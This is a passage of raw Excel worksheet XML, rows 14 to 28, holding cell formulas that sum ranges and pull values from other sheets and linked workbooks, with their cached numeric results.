      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>3752</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'12'!H14</f>
        <v>32227</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>996770.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>6312.85</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'12'!K14</f>
        <v>70448.455</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1863392.561</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>62579.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]13'!$W$71</f>
        <v>204.314420803782</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]13'!$X$71</f>
        <v>217.567029088632</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]13'!$Y$71</f>
        <v>213.670496433985</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]13'!$T$71</f>
        <v>70.5</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]13'!$U$71</f>
        <v>56.3044871794872</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]13'!$V$71</f>
        <v>50.4583333333333</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]13'!$Q$71</f>
        <v>16.92</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]13'!$R$71</f>
        <v>175.67</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]13'!$S$71</f>
        <v>4202.17</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'12'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>0</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'12'!K15</f>
        <v>4620.633</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>119377.133</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]13'!$W$72</f>
        <v>46.25</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]13'!$X$72</f>
        <v>62.5746287067647</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]13'!$Y$72</f>
        <v>61.3454861314347</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]13'!$T$72</f>
        <v>100</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]13'!$U$72</f>
        <v>64.9583333333333</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]13'!$V$72</f>
        <v>51.2868635926993</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]13'!$Q$72</f>
        <v>24.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]13'!$R$72</f>
        <v>202.67</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]13'!$S$72</f>
        <v>4271.17</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'12'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'12'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]13'!$W$73</f>
        <v>47.2916666666667</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]13'!$X$73</f>
        <v>60.5664380520057</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]13'!$Y$73</f>
        <v>62.8085444476776</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]13'!$T$73</f>
        <v>100</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]13'!$U$73</f>
        <v>64.9583333333333</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]13'!$V$73</f>
        <v>52.8203650336215</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]13'!$Q$73</f>
        <v>24.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]13'!$R$73</f>
        <v>202.67</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]13'!$S$73</f>
        <v>4398.88</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'12'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'12'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]13'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]13'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]13'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]13'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]13'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]13'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]13'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]13'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]13'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'12'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'12'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]13'!$W$74</f>
        <v>218.8</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]13'!$X$74</f>
        <v>217.4</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]13'!$Y$74</f>
        <v>222.151267886405</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]13'!$T$74</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]13'!$U$74</f>
        <v>9.61538461538462</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]13'!$V$74</f>
        <v>7.10770893371758</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]13'!$Q$74</f>
        <v>10</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]13'!$R$74</f>
        <v>30</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]13'!$S$74</f>
        <v>591.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'12'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'12'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]13'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]13'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]13'!$Y$72</f>
        <v>9.12429378531073e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]13'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]13'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]13'!$V$72</f>
        <v>4.2507204610951e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]13'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]13'!$R$72</f>
        <v>1.3e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]13'!$S$72</f>
        <v>0.000354</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'12'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'12'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]13'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]13'!$X$73</f>
        <v>1e-5</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]13'!$Y$73</f>
        <v>239.29985753189</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]13'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]13'!$U$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]13'!$V$73</f>
        <v>69.4251963736792</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]13'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]13'!$R$73</f>
        <v>1.3e-5</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]13'!$S$73</f>
        <v>5781.730354</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]13'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]13'!$E$22</f>
        <v>5366</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'12'!H21</f>
        <v>87300</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2196738</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]13'!$I$22</f>
        <v>6616.28</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'12'!K21</f>
        <v>102674.76</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2169128.76</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]13'!$L$22</f>
        <v>67678.55</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>143.996914893617</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]13'!$W$81</f>
        <v>267.75</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]13'!$X$81</f>
        <v>281.148321741439</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]13'!$Y$81</f>
        <v>275.9169728982</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]13'!$T$81</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]13'!$U$81</f>
        <v>41.9226317663818</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]13'!$V$81</f>
        <v>36.3420022147508</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]13'!$Q$81</f>
        <v>8</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]13'!$R$81</f>
        <v>130.798611111111</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]13'!$S$81</f>
        <v>3026.56194444445</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]13'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]13'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'12'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]13'!$I$17</f>
        <v>6070.71</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'12'!K22</f>
        <v>86241.96</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1977703.34</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]13'!$L$17</f>
        <v>166384.392</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>83.192196</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]13'!$W$79</f>
        <v>104.434782608696</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]13'!$X$79</f>
        <v>100.754090336442</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]13'!$Y$79</f>
        <v>102.193158579322</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]13'!$T$79</f>
        <v>47.9166666666667</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]13'!$U$79</f>
        <v>54.2034366096866</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]13'!$V$79</f>
        <v>45.7093373092112</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]13'!$Q$79</f>
        <v>11.5</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]13'!$R$79</f>
        <v>169.114722222222</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]13'!$S$79</f>
        <v>3806.67361111111</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]13'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]13'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'12'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]13'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'12'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]13'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]13'!$W$80</f>
        <v>89.6373807936462</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]13'!$X$80</f>
        <v>84.9254353625951</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]13'!$Y$80</f>
        <v>79.4137772959541</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]13'!$T$80</f>
        <v>39.9293981481482</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]13'!$U$80</f>
        <v>43.3487357549858</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]13'!$V$80</f>
        <v>32.9023041413171</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]13'!$Q$80</f>
        <v>9.58305555555556</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]13'!$R$80</f>
        <v>135.248055555556</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]13'!$S$80</f>
        <v>2740.10388888889</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]13'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]13'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'12'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]13'!$I$56</f>
        <v>2007.71</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'12'!K24</f>
        <v>22569.18</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>302395.71</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]13'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]13'!$R$6</f>
        <v>82.8923076923077</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]13'!$S$6</f>
        <v>83.7031039136302</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]13'!$T$6</f>
        <v>86.0569468643601</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]13'!$O$6</f>
        <v>67.7083333333333</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]13'!$P$6</f>
        <v>59.375</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]13'!$Q$6</f>
        <v>52.5836935638809</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]13'!$L$6</f>
        <v>16.25</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]13'!$M$6</f>
        <v>185.25</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]13'!$N$6</f>
        <v>4379.17</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]13'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'12'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]13'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'12'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]13'!$R$7</f>
        <v>210.769230769231</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]13'!$S$7</f>
        <v>203.378763866878</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]13'!$T$7</f>
        <v>188.167919757531</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]13'!$O$7</f>
        <v>67.7083333333333</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]13'!$P$7</f>
        <v>50.5608974358974</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]13'!$Q$7</f>
        <v>50.1960854947166</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]13'!$L$7</f>
        <v>16.25</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]13'!$M$7</f>
        <v>157.75</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]13'!$N$7</f>
        <v>4180.33</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'12'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'12'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]13'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]13'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]13'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]13'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]13'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]13'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]13'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]13'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]13'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'12'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'12'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]13'!$W$69</f>
        <v>21.9377386684377</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]13'!$X$69</f>
        <v>22.6074844509486</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]13'!$Y$69</f>
        <v>25.271376758766</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]13'!$T$69</f>
        <v>100</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]13'!$U$69</f>
        <v>69.3333333333333</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]13'!$V$69</f>
        <v>68.4101825168108</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]13'!$Q$69</f>
        <v>24.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]13'!$R$69</f>
        <v>216.32</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]13'!$S$69</f>
        <v>5697.20</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'12'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'12'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]13'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]13'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]13'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]13'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]13'!$U$104</f>
        <v>74.0278846153846</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]13'!$V$104</f>
